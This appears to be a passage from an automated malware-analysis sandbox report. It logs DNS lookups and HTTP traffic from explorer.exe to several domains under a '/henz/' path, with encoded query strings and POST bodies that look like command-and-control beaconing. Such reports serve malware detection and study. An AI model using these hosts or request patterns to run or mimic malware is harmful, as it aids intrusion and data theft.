                                            Nov 30, 2022 01:11:04.318644047 CET53592208.8.8.8192.168.2.5
                                            Nov 30, 2022 01:11:05.325809002 CET5668253192.168.2.58.8.8.8
                                            Nov 30, 2022 01:11:06.344841003 CET5668253192.168.2.58.8.8.8
                                            Nov 30, 2022 01:11:06.350476027 CET53566828.8.8.8192.168.2.5
                                            Nov 30, 2022 01:11:07.118748903 CET53566828.8.8.8192.168.2.5

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Nov 30, 2022 01:11:07.119535923 CET192.168.2.58.8.8.8cff9(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 30, 2022 01:10:28.856163025 CET192.168.2.58.8.8.80xdc74Standard query (0)www.eufidelizo.comA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:39.525219917 CET192.168.2.58.8.8.80xccc6Standard query (0)www.lyonfinancialusa.comA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:47.853636980 CET192.168.2.58.8.8.80x22daStandard query (0)www.afterdarksocial.clubA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:55.547888041 CET192.168.2.58.8.8.80x18f9Standard query (0)www.patrickguarte.comA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:03.553632021 CET192.168.2.58.8.8.80x4db1Standard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:05.325809002 CET192.168.2.58.8.8.80xf47dStandard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:06.344841003 CET192.168.2.58.8.8.80xf47dStandard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 30, 2022 01:10:29.011351109 CET8.8.8.8192.168.2.50xdc74No error (0)www.eufidelizo.comeufidelizo.comCNAME (Canonical name)IN (0x0001)false
                                            Nov 30, 2022 01:10:29.011351109 CET8.8.8.8192.168.2.50xdc74No error (0)eufidelizo.com192.185.217.47A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:39.704725981 CET8.8.8.8192.168.2.50xccc6No error (0)www.lyonfinancialusa.com206.233.197.135A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:48.007566929 CET8.8.8.8192.168.2.50x22daNo error (0)www.afterdarksocial.club162.214.129.149A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:55.726146936 CET8.8.8.8192.168.2.50x18f9No error (0)www.patrickguarte.com155.159.61.221A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:04.318644047 CET8.8.8.8192.168.2.50x4db1Server failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:06.350476027 CET8.8.8.8192.168.2.50xf47dServer failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:07.118748903 CET8.8.8.8192.168.2.50xf47dServer failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.eufidelizo.com
                                            • www.lyonfinancialusa.com
                                            • www.afterdarksocial.club
                                            • www.patrickguarte.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.549707192.185.217.4780C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:29.149192095 CET131OUTGET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1
                                            Host: www.eufidelizo.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 30, 2022 01:10:29.279675961 CET132INHTTP/1.1 404 Not Found
                                            Date: Wed, 30 Nov 2022 00:10:29 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Thu, 29 Sep 2022 21:55:23 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 11816
                                            Vary: Accept-Encoding
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{
                                            Nov 30, 2022 01:10:29.279721975 CET133INData Raw: 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74 6f 20 2d 31 30 70 78 20 61 75 74 6f 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e
                                            Data Ascii: float:left;padding:40px 397px 10px; margin: auto auto -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{font-size:30px;font-weight:800;} #container
                                            Nov 30, 2022 01:10:29.279748917 CET135INData Raw: 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 35 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69
                                            Data Ascii: 4 #content #accordion p {font-size: 95%; text-align: left;} #container #mid404 #content #accordion h3 {font-weight: bold;} #container #mid404 #content #accordion h4 {font-weight: bold; font-style: italic; text-align: left;} .co
                                            Nov 30, 2022 01:10:29.279777050 CET136INData Raw: 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 48 6f 74 20 4c 69 6e 6b 20 50 72 6f 74 65 63 74 69 6f 6e 20 74 75 72 6e 65 64 20 6f 6e 20 61 6e 64 20 74 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 6e 6f 74 20 6f 6e 20 74 68 65 20 6c 69 73 74 20 6f 66 20
                                            Data Ascii: cause you have Hot Link Protection turned on and the domain is not on the list of authorized domains.</p><p>If you go to your temporary url (http://ip/~username/) and get this error, there maybe a problem with the rule set stored in
                                            Nov 30, 2022 01:10:29.279805899 CET137INData Raw: 6e 67 3e 20 69 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 20 74 68 69 73 20 65 78 61 6d 70 6c 65 2e 20 4f 6e 20 70 6c 61 74 66 6f 72 6d 73 20 74 68 61 74 20 65 6e 66 6f 72 63 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 69 74 79 20 3c 73 74 72 6f
                                            Data Ascii: ng> is important in this example. On platforms that enforce case-sensitivity <strong>e</strong>xample and <strong>E</strong>xample are not the same locations.</p><p>For addon domains, the file must be in public_html/addondomain.com/ex
                                            Nov 30, 2022 01:10:29.279834986 CET139INData Raw: 6f 6e 73 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 77 70 22 3e 0a 09 09 09 09 09 09 3c 68 33 3e 3c 61 20 63 6c 61 73 73 3d 22 65 78 70 61 6e 64
                                            Data Ascii: ons.</p></div></div><div id="wp"><h3><a class="expander" href=#>404 Errors After Clicking WordPress Links</a></h3><div class="content"><p>When working with WordPress, 404 Page Not Found errors can
                                            Nov 30, 2022 01:10:29.279865026 CET140INData Raw: 69 74 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 64 69 72 65 63 74 6c 79 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e 4f 70 74 69 6f 6e 20 32 3a 20 4d 6f 64 69 66 79 20 74 68 65 20 2e 68 74 61 63 63 65 73 73
                                            Data Ascii: it your .htaccess file directly.</p><h4><u>Option 2: Modify the .htaccess File</u></h4><p>Add the following snippet of code<em> </em>to the top of your .htaccess file:</p><div class="code"><p>#
                                            Nov 30, 2022 01:10:29.279892921 CET141INData Raw: 72 79 20 63 6f 6d 6d 6f 6e 20 64 69 72 65 63 74 69 76 65 73 20 66 6f 75 6e 64 20 69 6e 20 61 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 61 6e 64 20 6d 61 6e 79 20 73 63 72 69 70 74 73 20 73 75 63 68 20 61 73 20 57 6f 72 64 50 72 65 73 73
                                            Data Ascii: ry common directives found in a .htaccess file, and many scripts such as WordPress, Drupal, Joomla and Magento add directives to the .htaccess so those scripts can function.</p><p>It is possible that you may need to edit the .htaccess
                                            Nov 30, 2022 01:10:29.279922009 CET143INData Raw: 6e 61 67 65 72 3c 2f 73 74 72 6f 6e 67 3e 20 69 63 6f 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 43 68 65 63 6b 20 74 68 65 20 62 6f 78 20 66 6f 72 26 6e 62 73 70 3b 3c 73 74 72 6f 6e 67 3e 44 6f 63 75 6d 65 6e 74 20 52 6f 6f
                                            Data Ascii: nager</strong> icon.</li><li>Check the box for&nbsp;<strong>Document Root for</strong> and select the domain name you wish to access from the drop-down menu.</li><li>Make sure&nbsp;<strong>Show Hidden Files (dotfiles)</stro
                                            Nov 30, 2022 01:10:29.279942989 CET143INData Raw: 20 76 65 72 73 69 6f 6e 20 75 6e 74 69 6c 20 79 6f 75 72 20 73 69 74 65 20 77 6f 72 6b 73 20 61 67 61 69 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 4f 6e 63 65 20 63 6f 6d 70 6c 65 74 65 2c 20 79 6f 75 20 63 61 6e 20 63 6c 69
                                            Data Ascii: version until your site works again.</li><li>Once complete, you can click&nbsp;<strong>Close</strong> to close the File Manager window.</li></ol></div></div></div></div> </div> <d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.549709206.233.197.13580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:39.960500956 CET151OUTPOST /henz/ HTTP/1.1
                                            Host: www.lyonfinancialusa.com
                                            Connection: close
                                            Content-Length: 189
                                            Cache-Control: no-cache
                                            Origin: http://www.lyonfinancialusa.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.lyonfinancialusa.com/henz/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00
                                            Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
                                            Nov 30, 2022 01:10:40.547215939 CET152INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 30 Nov 2022 00:10:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            X-Powered-By: PHP/8.0.8
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            X-Redirect-By: WordPress
                                            Location: https://www.lyonfinancialusa.com/henz/
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.549710206.233.197.13580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:42.253814936 CET153OUTGET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1
                                            Host: www.lyonfinancialusa.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 30, 2022 01:10:42.818850040 CET153INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 30 Nov 2022 00:10:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            X-Powered-By: PHP/8.0.8
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            X-Redirect-By: WordPress
                                            Location: https://www.lyonfinancialusa.com/henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.549711162.214.129.14980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:48.177809000 CET155OUTPOST /henz/ HTTP/1.1
                                            Host: www.afterdarksocial.club
                                            Connection: close
                                            Content-Length: 189
                                            Cache-Control: no-cache
                                            Origin: http://www.afterdarksocial.club
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.afterdarksocial.club/henz/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Raw: 43 68 4d 78 47 34 43 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 43 78 53 33 28 64 77 2d 6c 4b 73 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00
                                            Data Ascii: ChMxG4C=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jCxS3(dw-lKsshGSVcA).
                                            Nov 30, 2022 01:10:48.344644070 CET156INHTTP/1.1 404 Not Found
                                            Date: Wed, 30 Nov 2022 00:10:48 GMT
                                            Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                                            Accept-Ranges: bytes
                                            Connection: close
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html
                                            Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 23 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20
                                            Data Ascii: 1195<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <title>579404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; color: #FFFFFF;margin:0; } a { color:#021f25; text-decoration:none} h1 { font-size: 18px; color: #FB9802; padding-bottom: 10px; background-image: url(sys_cpanel/images/bottombody.jpg); background-repeat: repeat-x; padding:5px 0 10px 15px;margin:0; } #body-content p { padding-left: 25px; padding-right: 25px;
                                            Nov 30, 2022 01:10:48.344672918 CET157INData Raw: 20 20 20 20 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a
                                            Data Ascii: line-height: 18px; padding-top: 5px; padding-bottom: 5px; } h2 { font-size: 14px; font-weight: bold; color: #FF9900; padding-left: 15px; } </style> </hea
                                            Nov 30, 2022 01:10:48.344693899 CET158INData Raw: 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: > </body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.549712162.214.129.14980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:50.366888046 CET158OUTGET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1
                                            Host: www.afterdarksocial.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 30, 2022 01:10:50.533715010 CET160INHTTP/1.1 404 Not Found
                                            Date: Wed, 30 Nov 2022 00:10:50 GMT
                                            Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                                            Accept-Ranges: bytes
                                            Connection: close
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html
